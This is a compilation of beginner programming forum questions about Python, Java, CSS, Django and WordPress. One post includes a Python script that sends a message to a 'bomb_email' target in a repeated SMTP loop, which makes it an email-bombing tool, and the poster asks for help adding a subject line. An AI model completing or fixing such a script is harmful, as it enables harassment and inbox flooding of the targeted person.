    30 day Python Challenge learn programming

    30 day Python Challenge

    Posted: 04 Oct 2019 06:22 PM PDT

    I am trying to put together a friendly competition between myself and a couple buddies. We must learn something or at learn as much as we can about something for 30 days. Inspired by Sober October. My choice is to learn Python. We will have to prove somehow that we learned this or else we lose.

    I am brand new to this. I am expecting to put about 2-3 hours a day during the week after work towards learning it. Undecided how much time will be dedicated on weekends. I have some very competitive friends, so I might go all in.

    I am aware 30 days is not sufficient to learn a whole lot. I am just curious what should be realistically expected to be able to create/learn in 30 days.

    My question is:

    What would be a fair benchmark or assessment to set for this time allotment?

    Should I be able to build a simple program or application by then? If so, what level of program should I be able to make? I don't want it to be too easy.

    What are your favorite books on general CS concepts/theory?

    Posted: 04 Oct 2019 05:00 AM PDT

    (I went through reddit search to find similar questions, but let's be real, reddit search is ass)

    Hello.

    I started my first job about 3 weeks ago and I moved cities, so for a while I'm gonna have a lot of free time at night to do what I want.

    I like to read a lot and although it's usually limited to fantasy/sci-fi, I feel like I should try to read some books on concepts and theories.

    Ideally they'd be books that don't require practical work, and aren't necessarily tied to a specific language.

    Does anyone have any good recommendations for books like that?

    Thanks!

    Is the best way to learn programming effectively to just pick an interesting project and find out how to do it? or take organized classes?

    Posted: 04 Oct 2019 04:59 PM PDT

    I took AP Java like 15 yrs ago. I could code, understood what things did, but never tried or knew how to do my own projects.

    Is it more practical to just learn on the go while getting a project done?

    Not trying to be a master, just trying to improve my daily life tasks on a level a little higher than simple scripting and hotkeying

    Currently playing around with AHK for games, and considering doing python for "bigger" projects with larger scopes

    Completely stuck on solving this interview preparation question. Is the problem even possible?

    Posted: 04 Oct 2019 03:27 PM PDT

    Link to problem statement and my code(or lack thereof) so far: https://gist.githubusercontent.com/jptboy/085127ad52977865837ef3f53099ea45/raw/8375f69d37b5751c90bc6170ae4dce2786ec6aec/problem.py

    Problem: Write a function that accepts an m x n matrix (array) of random numbers, and use the functions row (times) 2 and column-1 to set the entire array to 0.

    I was studying interview questions for a interview I have next week. I came across this question, and could not find it anywhere online at all. I have no idea where to even begin solving this. Is this problem possible? I am thinking about some recursive brute force strategy but I don't know where to begin.

    CSS frameworks, templates, and bootstrap

    Posted: 04 Oct 2019 04:31 PM PDT

    Hi everyone! First ever Reddit post here, so here goes... I'm working on learning web dev, and while playing around, I loaded an animated nav bar into a blank HTML file, and (following the instructions) linked to four css files (saved locally) that were longer than anything I'm used to seeing. My plan was to add in flexbox for the main content, but now I'm second guessing the idea. The nav bar css seems so big that I'm wondering if it isn't actually a full bootstrap setup.

    That got me wondering about combining bootstrap with flexbox or CSS grid in a single HTML document. Can someone she'd some light on this topic?

    Thanks in advance!

    Ultra beginner in HTML and CSS, struggling to make a horizontal navigation bar

    Posted: 04 Oct 2019 11:56 PM PDT

    I'm taking a class for website development using HTML and CSS. We're only a month in and it's an online course so it's hard to ask the professor detailed questions. The first page for my website is due Sunday, and I'm struggling with creating a navigation bar at the top of the page.

    This is what our textbook (HTML & CSS: design and build web sites by Jon Duckett) says on the matter. I tried that, but it's difficult because our assignment requires us to use a couple ordered and unordered lists on the same page so I'm not sure how to separate my Navigation list from the rest. I tried using a <div id> to separate it which I think I did right but it didn't work with my CSS. I think other people in the class are having trouble with it too because he uploaded an example in which he used <ul class> but the CSS in his example looked too complex for me to understand and trying to copy it didn't work for me personally.

    Can anyone help explain this to me a little better?

    Edit: I've been working on this all night and I'm exhausted. I have work in the morning too so it might take me a while to respond, but thank you to anyone who tries to help!

    How important is it to learn WordPress?

    Posted: 04 Oct 2019 02:57 PM PDT

    Good afternoon everyone!

    After doing some thinking about what exactly I wanted to do with the skills I'm currently learning, I've made the decision to pursue web development. I have been doing a Django tutorial on Udemy, and have been having a lot of fun doing it so far! I'm definitely not job ready yet, so I decided to try and find a mentor in my area that could help guide me in my next steps, as well as answering some general questions I had. I found a web developer that also owns a computer repair shop, and thought he would be the perfect person to reach out to. He was super friendly over email, and we met up and began talking about what I'm learning at the moment. I told him that I was learning Django, and his response surprised me a little. He seemed to sort of look down on me for learning this framework, and went on to say that he doesn't really know anyone that actually uses Django as a production framework. He told me that for the most part, he uses WordPress for almost every client project.

    I know of WordPress, but I didn't think it was something that most web developers would use. From my understanding, WordPress was more for people not quite versed in any sort of programming language, which made it a lot more user friendly. So my question is this: am I wasting hours learning Django instead of something simpler like WordPress? Although I am enjoying learning Django, it has been by no means easy for me; and there's some aspects I haven't fully grasped yet. My goal at the moment is to become proficient enough to begin doing freelance work so I can build up a client base and have some websites to add to my portfolio (which I haven't created yet, but soon). Is my mentor an outlier here? Or is this more common than I was led to believe? I guess I just feel a little let down right now, as I thought I was on the right track for my goals but now I'm wondering if I should be dedicating my time elsewhere.

    I'd also like to add that while my current short term goal is to become a web developer, my overall goal (next 8 months or so) is to learn something like ReactJS so I can finally get a job as a front-end developer. Then I would do the web development in my spare time to make extra money, as well as making websites for myself. Thanks in advance for any help you're able to provide.

    email = input("Enter your gmail_address:")
    password = getpass.getpass("Enter your gmail_password:")
    subject = input("Subject: ")
    message = input("Enter Message:")
    counter = int(input("How many message you want to send?:"))

    for x in range(0, counter):
    print("Number of Message Sent : ", x+1)
    mail = smtplib.SMTP("smtp.gmail.com", 587)
    mail.ehlo()
    mail.starttls()
    mail.login(email, password)
    mail.sendmail(email, bomb_email, message, subject)
    time.sleep(1)
    mail.close()
    except Exception as e:
    print("Something is wrong, please Re-try Again with Valid input.")

    I'm trying to make it send a subject in the email. What am I doing wrong?

    My name is Aaron. I am an apartment manager right now. But I have a BS in computers science with a focus on networking. I have taking a python class recently. I learned a bit. I have also taking a couple basic mysql classes. I would like to program an app for myself to keep track of rents. What I am curious about is, what would be the best language to program the program in? I have created a basic db for it already.

    Python at uni. I'm struggling

    Posted: 04 Oct 2019 03:06 AM PDT

    Hey everyone.

    I'm studying engineering, and has a course which is called introduction to programming and data processing. In that course I've chosen Python as it was recommended for those on my particular direction (design and mechanical engineering). However the pace is increasing, and the assignments are getting more and more difficult, naturally. However I don't feel myself getting much smarter. Even the most basic codes, I need to crack my head and really work around myself to figure out what to do. Like when to use an if statement and how to use it and when to define variables, and pretty much all around is something that I struggle with. It doesn't come to me naturally.

    So I'm looking for ideas how to wrap my head around a problem, maybe making some sort of flowchart by paper, or some techniques to remember how and when to use specific types of code.

    Also, I'd like to learn python more, and spend more time on it, so is something like codeacademy worth spending some money on? Or do people have experience with other things, that might be more beneficial?

    how to call on dictionary (API)

    Posted: 04 Oct 2019 10:45 PM PDT

    Hi guy's writting my first python program so bare with me on the dumb questions:

    I am getting data from an API that appears like this when printed:

    print(response.json())

    {'duration': 30, 'eReal': [31325, 46, 57, 32753, -1, 11], 'eReactive': [3683, -1, 0, 2030, -1, 0], 'vRMS': [235.2, 235.2, 235.2, 235.2, 235.2, 235.2], 'iRMS': [4.328, 0.0, 0.0, 5.139, 0.0, 0.0], 'frequency': 49.99, 'timestamp': 1570253395}'

    I am trying to pull the bold data [31325] out of the dictionary so i can use it for various funtions (Eventually i want to make it so if number is higher that x a certain funtion happens and if the number is lower than x a different funtion happens.

    But for now i would just like to pull that number out and divide it by 00.000000277777778

    I tried the following but I feel like I am way off:

    print(response.json('eReal'[0]))

    On second though I am definately WAY OFF

    Can anyone please advise me on how to load data from a XSD schema file into a textbox in VB.net?

    Posted: 04 Oct 2019 10:37 PM PDT

    My concept might be a little flawed since I am a beginner. I have an application written by someone else that reads an XSD schema file, loads the data from the datatables and views from the sql database and generates an xml file from it which is sent to the server via FTP.

    But I do not understand how the schema works. How do I pull the data stored in a datatable in sql and populate a textbox throught the XSD schema set? And how do I store that pulled data as a stored procedure?

    [JAVA] unclear on the concept of static and non static

    Posted: 04 Oct 2019 01:13 PM PDT

    So I'm doing some exercises as below, and the below works, but when I remove "public static" from the checkPermutation function, I was getting error "cannot be referenced from a static context" in my main function where I try to call checkPermutation on 2 strings.

    Can someone explain what the issue was/is? From what I gathered from a bit of googling, static means it belongs to the class as a whole and cannot be changed right? But after that I'm lost, why does adding "public static" to my function work but without it, it doesn't?

    import java.util.*; class exercise { public static boolean checkPermutation (String str1, String str2) { // check string lengths against each other if (str1.length() != str2.length()) { return false; } // if same length, sort strings and compare // sort by converting string to char array // then using Arrays.sort char[] chars1 = str1.toCharArray(); char[] chars2 = str2.toCharArray(); Arrays.sort(chars1); Arrays.sort(chars2); String sorted1 = new String(chars1); String sorted2 = new String(chars2); if (!sorted1.equals(sorted2)) return false; return true; } public static void main(String args[]) { exercise test = new exercise(); if (args.length > 1 && args.length < 3) { String string1 = args[0]; String string2 = args[1]; if (checkPermutation(string1, string2)) System.out.println(true); else System.out.println(false); } else System.out.println("Not enough arguments"); } }

    Should I apply for Graduate school?

    Posted: 04 Oct 2019 09:47 PM PDT

    Hey,

    I am a senior student of Computer Science. My GPA is 3.71. I have an option or two of applying to graduate school. I had no prior knowledge while entering the undergraduate school. Despite my GPA, which is better than average, I feel below average when it comes to my skills and abilities. I suck at writing code, as I used to dedicate all my time to studies and was not able to work. I want to pursue graduate school in ML and Data Science. Can I get the same kind of GPA by theoretical knowledge and dedication? I am willing to sacrifice whatever is needed, but obviously there will be professionals with years of experience in industry studying alongside me.

    Cheers!

    Need help with Java in Eclipse, and help would be greatly appreciated.

    Posted: 04 Oct 2019 08:50 PM PDT

    Hello, so for one of my CS classes we need to create a currency converter in Java using eclipse. Now, previous to this class, I have never coded in my life. (Well,besides HTML, but ya' know.) And to be honest, my professor isn't very good. I have been trying to email him for help, but he simply won't respond to my emails/help me. I'm trying to get better but honestly I just feel so down in the dumps about this assignment. He makes it seem like all of this is common sense and he shouldn't have to explain it, but I just don't get it.

    So we have to make a currency converter and this is the code he gave us to start out with. He said we should be able to make it from this code, but I am having a tough time. I just don't understand it and I don't know where to start. If anyone can help me, I would really appreciate it.

    public class CurrencyConvertor

    {

    //data private double exchangeRate; //ratio of foreign to US //methods //public double toUS(double amt) //public double fromUS(double amt) //public void setX(double x) public double toUs(double amt)

    {

     amt = amt / exchangeRate; return amt; } public double fromUs(double amt) { amt = amt \* exchangeRate; return amt; } public void setX(double X) { exchangeRate = X; } //constructor(s) public CurrencyConvertor(double X) { exchangeRate= X; } public static void main(String\[\] args) {

     } //test constructor CurrencyConvertor MexicanCC = new CurrencyConvertor(20.0); //test toUs double answer = MexicanCC.toUs(100.0); }

    If anyone can guide me a bit/explain what is happening I would be so grateful.
